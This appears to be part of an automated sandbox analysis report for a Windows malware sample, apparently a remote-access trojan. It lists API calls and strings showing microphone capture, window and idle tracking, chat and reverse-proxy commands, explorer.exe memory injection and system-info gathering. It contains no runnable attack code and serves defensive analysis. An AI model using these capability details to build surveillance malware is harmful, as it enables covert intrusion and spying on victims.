Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02471D3F,?,00000050,00465290,00000000), ref: 024A9620
GetLastError.KERNEL32(?,?,02471D3F,?,00000050,00465290,00000000), ref: 024A962D
__dosmaperr.LIBCMT ref: 024A9634
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02471D3F,?,00000050,00465290,00000000), ref: 024A9660
GetLastError.KERNEL32(?,?,?,02471D3F,?,00000050,00465290,00000000), ref: 024A966A
__dosmaperr.LIBCMT ref: 024A9671
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,00465290,00000000,00000000,?,?,?,?,?,?,02471D3F,?), ref: 024A96B4
GetLastError.KERNEL32(?,?,?,?,?,?,02471D3F,?,00000050,00465290,00000000), ref: 024A96BE
__dosmaperr.LIBCMT ref: 024A96C5
_free.LIBCMT ref: 024A96D1
_free.LIBCMT ref: 024A96D8

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 7dca9c723f0a3f3e5eee78a7163c4708e0db19878e5bf6bf14be5ff931373868
Instruction ID: 820e643eb3c22e4b5affe6d20577117d3fbddc0abfc7a747b4ac46b64b365034
Opcode Fuzzy Hash: 7dca9c723f0a3f3e5eee78a7163c4708e0db19878e5bf6bf14be5ff931373868
Instruction Fuzzy Hash: 0A31EE7240424ABFDF12AFA9DC94DAF3B7EEF04761F14016AF82056290EB31C910DB61

Function 024889BB Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON

Download Yara Rule

Strings

7, xrefs: 02488BB3
4, xrefs: 02488B41
5, xrefs: 02488B92
1, xrefs: 02488A1D
0, xrefs: 024889E4
2, xrefs: 02488A7D
6, xrefs: 02488B9C
3, xrefs: 02488ADD

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7
API String ID: 0-3177665633
Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
Instruction ID: 442436a86d0111a65155c0bdc3a6a8563c67557d6c833b827b10aa22bd588cfd
Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
Instruction Fuzzy Hash: 1261C071599305AED700EF21D851AEF77E5BF95720F80484EF5A1572E2DB309A08CBA3

Function 004016E8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 175threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00411D64: Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
Part of subcall function 00411D64: Sleep.KERNEL32(0000000A,00465324), ref: 00411E8E

waveInPrepareHeader.WINMM(008E54D8,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
waveInAddBuffer.WINMM(008E54D8,00000020,?,00000000,00401913), ref: 0040175D
__Init_thread_footer.LIBCMT ref: 004017BC
RtlExitUserThread.KERNEL32(00000000,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 004017F4
waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902

Strings

>G, xrefs: 0040180B
>G, xrefs: 0040188E
T=G, xrefs: 00401800
T=G, xrefs: 004016F6

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: wave$HeaderSleep$BufferExitInit_thread_footerPrepareThreadUnprepareUser
String ID: T=G$T=G$>G$>G
API String ID: 3199572594-3827144107
Opcode ID: 3fe0f09cd82996b43712a872b917cdb4d4fc01cb9016171897fe3e88c6e9a225
Instruction ID: 2c00e5c4c4fa6ec426b9aec1bace8108f425c0794315d39882fc37073dd324be
Opcode Fuzzy Hash: 3fe0f09cd82996b43712a872b917cdb4d4fc01cb9016171897fe3e88c6e9a225
Instruction Fuzzy Hash: 08518D316042019BC724EB25ECA6EAE77A5EB94318F00453FF40AA71F2DF78A945CB5D

Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00404E71
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
TranslateMessage.USER32(?), ref: 00404F30
DispatchMessageA.USER32(?), ref: 00404F3B
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B

Part of subcall function 00404468: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 004044FD

Strings

CloseChat, xrefs: 00404FBB
GetMessage, xrefs: 00404FAA
DisplayMessage, xrefs: 00404F9E

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: 5d7f3709bbd07bf617d91f431db4075459c4be083c869a4abf9020e416bfa47b
Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
Opcode Fuzzy Hash: 5d7f3709bbd07bf617d91f431db4075459c4be083c869a4abf9020e416bfa47b
Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A

Function 024750B9 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 024750D8
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02475188
TranslateMessage.USER32(?), ref: 02475197
DispatchMessageA.USER32(?), ref: 024751A2
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 0247525A
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 02475292

Part of subcall function 024746CF: send.WS2_32(?,00000000,00000000,00000000), ref: 02474764

Strings

CloseChat, xrefs: 02475222
GetMessage, xrefs: 02475211
DisplayMessage, xrefs: 02475205

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
Instruction ID: c65d8292460bdb3557b7d26de3cd5401a0989fd1d9241a7d5d7faefbe23a2b96
Opcode Fuzzy Hash: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
Instruction Fuzzy Hash: 8041A0326042406BC715FB769C588AE37EAEB85710F40492EFD26972A4EF34DA09CB56

Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
CloseHandle.KERNEL32(00000000), ref: 00416F2D
DeleteFileA.KERNEL32(00000000), ref: 00416F3C
ShellExecuteEx.SHELL32(0000003C), ref: 00416EF0

Part of subcall function 00404468: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 004044FD

Strings

@FG, xrefs: 00416EFD
<, xrefs: 00416ECB
@, xrefs: 00416ED2
@FG, xrefs: 00416F69
Temp, xrefs: 00416E48

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
String ID: <$@$@FG$@FG$Temp
API String ID: 1107811701-2245803885
Opcode ID: 8a8c3eae64e739a3c973a6af1c4ec6e485e03caf33bf669323923fba599abf03
Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
Opcode Fuzzy Hash: 8a8c3eae64e739a3c973a6af1c4ec6e485e03caf33bf669323923fba599abf03
Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99

Function 0248708E Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 0248718B
CloseHandle.KERNEL32(00000000), ref: 02487194
DeleteFileA.KERNEL32(00000000), ref: 024871A3
ShellExecuteEx.SHELL32(0000003C), ref: 02487157

Part of subcall function 024746CF: send.WS2_32(?,00000000,00000000,00000000), ref: 02474764

Strings

@FG, xrefs: 024871D0
@FG, xrefs: 02487164
TUF, xrefs: 0248715F
<, xrefs: 02487132
@, xrefs: 02487139

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
String ID: <$@$@FG$@FG$TUF
API String ID: 1107811701-3315534519
Opcode ID: c09cddb986173b223f0ae78b0a5cb3d5da982f6b9b7ae30d07bc44f4aa3a3996
Instruction ID: f71331607de9f938ee317c9befcc85d42b4b53d83b5f5adf45e796a08da6b3b2
Opcode Fuzzy Hash: c09cddb986173b223f0ae78b0a5cb3d5da982f6b9b7ae30d07bc44f4aa3a3996
Instruction Fuzzy Hash: 9D31A231A002099BCB15FBA5DC65AFE7736FF10300F50416EEA16661E4EFB45A8ACF91

Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\2iH7rqx9rQ.exe), ref: 00406705

Strings

[-] NtAllocateVirtualMemory Error, xrefs: 004066AA
BG3i@, xrefs: 0040662C, 00406637
PEB: %x, xrefs: 00406716
explorer.exe, xrefs: 004066BD, 004066E2
windir, xrefs: 00406654
\explorer.exe, xrefs: 0040666A
[+] NtAllocateVirtualMemory Success, xrefs: 0040667A

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
API String ID: 2050909247-4145329354
Opcode ID: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
Opcode Fuzzy Hash: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D

Function 00419C85 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 7464ab6df9b73b028722c922eb0d453872c69d8b1d8977db9f1c49eda1e68973
Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
Opcode Fuzzy Hash: 7464ab6df9b73b028722c922eb0d453872c69d8b1d8977db9f1c49eda1e68973
Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5

Function 00446DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00446DDF

Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED

_free.LIBCMT ref: 00446DEB
_free.LIBCMT ref: 00446DF6
_free.LIBCMT ref: 00446E01
_free.LIBCMT ref: 00446E0C
_free.LIBCMT ref: 00446E17
_free.LIBCMT ref: 00446E22
_free.LIBCMT ref: 00446E2D
_free.LIBCMT ref: 00446E38
_free.LIBCMT ref: 00446E46

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85

Function 024B7032 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024B7046

Part of subcall function 024B6D2C: HeapFree.KERNEL32(00000000,00000000,?,024BFCB7,?,00000000,?,00000000,?,024BFF5B,?,00000007,?,?,024C046C,?), ref: 024B6D42
Part of subcall function 024B6D2C: GetLastError.KERNEL32(?,?,024BFCB7,?,00000000,?,00000000,?,024BFF5B,?,00000007,?,?,024C046C,?,?), ref: 024B6D54

_free.LIBCMT ref: 024B7052
_free.LIBCMT ref: 024B705D
_free.LIBCMT ref: 024B7068
_free.LIBCMT ref: 024B7073
_free.LIBCMT ref: 024B707E
_free.LIBCMT ref: 024B7089
_free.LIBCMT ref: 024B7094
_free.LIBCMT ref: 024B709F
_free.LIBCMT ref: 024B70AD

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
Instruction ID: 296f5f2e04415da1c5589c301046d5a0b57cc4267388037e3a19a88b734ec8b1
Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
Instruction Fuzzy Hash: B6115376500108AFDF42EF66D841CD93F7EAF04350F5250AAF9084B225DA32EE50DFA4

Function 02481EE8 Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 479fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02481F01

Part of subcall function 0248AD9F: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,02473CA7), ref: 0248ADC6

Part of subcall function 0248791D: CloseHandle.KERNEL32(02473D20,?,?,02473D20,00465324), ref: 02487933
Part of subcall function 0248791D: CloseHandle.KERNEL32($SF,?,?,02473D20,00465324), ref: 0248793C

DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 024821F8
DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 0248222F
DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 0248226B

Part of subcall function 024746CF: send.WS2_32(?,00000000,00000000,00000000), ref: 02474764

Strings

HDG, xrefs: 0248257D
>G, xrefs: 02482399
HDG, xrefs: 02482459
>G, xrefs: 024824E5

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: HDG$HDG$>G$>G
API String ID: 1937857116-1666402509
Opcode ID: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
Instruction ID: d83ec0d8c4bc4f017135331c15397b7735a0682d8e1e69694ec350bab4e6d8ed
Opcode Fuzzy Hash: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
Instruction Fuzzy Hash: 510224316583814BC729FB35D860BEF73D6AF94300F50482FE99A56294EFB09A49CF52

Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00410333
inet_ntoa.WS2_32(?), ref: 004103CE

Strings

StopReverse, xrefs: 004104C0
StartForward, xrefs: 00410492
>G, xrefs: 00410359
StartReverse, xrefs: 0041049E
StopForward, xrefs: 004104AF
GetDirectListeningPort, xrefs: 004104D1

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
API String ID: 3578746661-4192532303
Opcode ID: 4c0d6b3e231743c76b023da39a852085526b8ca4f1cbf92172a455ed80af9033
Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
Opcode Fuzzy Hash: 4c0d6b3e231743c76b023da39a852085526b8ca4f1cbf92172a455ed80af9033
Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F

Function 0248057B Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0248059A
inet_ntoa.WS2_32(?), ref: 02480635

Strings

StartReverse, xrefs: 02480705
StopReverse, xrefs: 02480727
>G, xrefs: 024805C0
StopForward, xrefs: 02480716
StartForward, xrefs: 024806F9
GetDirectListeningPort, xrefs: 02480738

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
API String ID: 3578746661-4192532303
Opcode ID: a05e0ddbe8dc3814f036cc210c9733109e43822c73ea3fc4ff0ab9c9ada38e94
Instruction ID: 22b12d6928c90a1d2f2a26422b9a7c06273fa04c012319337b883b3b7c251ff8
Opcode Fuzzy Hash: a05e0ddbe8dc3814f036cc210c9733109e43822c73ea3fc4ff0ab9c9ada38e94
Instruction Fuzzy Hash: 1351E831A242505BC714FB39D859ABE36E6AF80700F40452FE91A972E0EF74AD49CF96

Function 0248A422 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0248A519
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0248A555
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000), ref: 0248A566
SetEvent.KERNEL32 ref: 0248A5F1
WaitForSingleObject.KERNEL32(000001F4), ref: 0248A602
CloseHandle.KERNEL32 ref: 0248A612

Strings

TUF, xrefs: 0248A532
open ", xrefs: 0248A4AD

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateExistsFileHandleObjectPathSendSingleStringWait
String ID: TUF$open "
API String ID: 1811012380-2979349893
Opcode ID: afa000e900512d794b59872f8fe6b6e7421b33da501b9bd85e28326864c8fc87
Instruction ID: b899b568ace3dd10cf611aa041039b3b5829005c6ed67db5ff0bbc0a95e00632
Opcode Fuzzy Hash: afa000e900512d794b59872f8fe6b6e7421b33da501b9bd85e28326864c8fc87
Instruction Fuzzy Hash: 5551D1612042446FD614FB31DC91EBF379EEB80744F10002FF966922A5EFA49D89CEA6

Function 0247A65B Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 158sleepCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0247A6BD
Sleep.KERNEL32(000001F4), ref: 0247A6C8
GetForegroundWindow.USER32 ref: 0247A6CE
GetWindowTextLengthW.USER32(00000000), ref: 0247A6D7
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0247A70B
Sleep.KERNEL32(000003E8), ref: 0247A7DB

Part of subcall function 02479FBF: SetEvent.KERNEL32(00000000,?,00000000,0247AB83,00000000), ref: 02479FEB

Strings

[, xrefs: 0247A775
{ User has been idle for , xrefs: 0247A812

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for
API String ID: 911427763-3934435721
Opcode ID: 6d776f70f920023e5288755160ba8f24f5da9fa6db96a00e1421ea32c0579234
Instruction ID: 2b9d4ad929f2f8c9e32d85006a8600c6fe934661e6b52d2f08c2b32194e9eb9b
Opcode Fuzzy Hash: 6d776f70f920023e5288755160ba8f24f5da9fa6db96a00e1421ea32c0579234
Instruction Fuzzy Hash: AA5114316086405BC314FB31C858BEE77A6EB84704F10092FF9A6972E0EFA4DA45CE96

Function 00455139 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C

Strings

sqrt, xrefs: 004552E0
acos, xrefs: 004552D4
exp, xrefs: 00455221, 00455283
pow, xrefs: 00455240, 004552EC, 004552FF
asin, xrefs: 004552C8
log10, xrefs: 004551A6, 004551F6
log, xrefs: 00455202, 0045520E

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
Opcode Fuzzy Hash: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D

Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C

Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00475B70,00473D54,?,00000000,00411F7E,00465324,00465324,00465324,00401703), ref: 0041B633

Sleep.KERNEL32(00000064), ref: 00416688
DeleteFileW.KERNEL32(00000000), ref: 004166BC

Strings

open, xrefs: 00416656
dxdiag, xrefs: 00416651
\sysinfo.txt, xrefs: 00416607
temp, xrefs: 0041660C
/t , xrefs: 0041663B

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: 30d7e693d2c089cce1d57f4e73a0cb7beaf4dba323f5b7dbad0c3c2391dbfb67
Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
Opcode Fuzzy Hash: 30d7e693d2c089cce1d57f4e73a0cb7beaf4dba323f5b7dbad0c3c2391dbfb67
Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D

Function 0248708B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 102filesynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 0248718B
CloseHandle.KERNEL32(00000000), ref: 02487194
DeleteFileA.KERNEL32(00000000), ref: 024871A3
ShellExecuteEx.SHELL32(0000003C), ref: 02487157

Part of subcall function 024746CF: send.WS2_32(?,00000000,00000000,00000000), ref: 02474764

Strings

@FG, xrefs: 02487164
TUF, xrefs: 0248715F
<, xrefs: 02487132
@, xrefs: 02487139

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

